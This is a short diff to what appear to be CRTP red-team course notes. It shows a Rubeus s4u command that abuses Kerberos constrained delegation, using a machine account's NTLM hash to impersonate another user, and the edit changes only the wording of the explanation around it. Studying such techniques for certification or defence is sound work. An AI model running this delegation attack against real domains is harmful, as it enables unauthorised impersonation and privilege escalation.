conma293/CRTP/#Commands Ref.md

 #### SFU - constrained delegation machine

-We could also just do it all in one RUBEUS command e.g., constrained delegation machine in possession of machine account NTLM hash:
+We could also just do it all in one command

+in possession of constrained delegation machine account NTLM hash:

 ```Rubeus.exe s4u /user:WEBSRV01$ /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:SQLDatabase```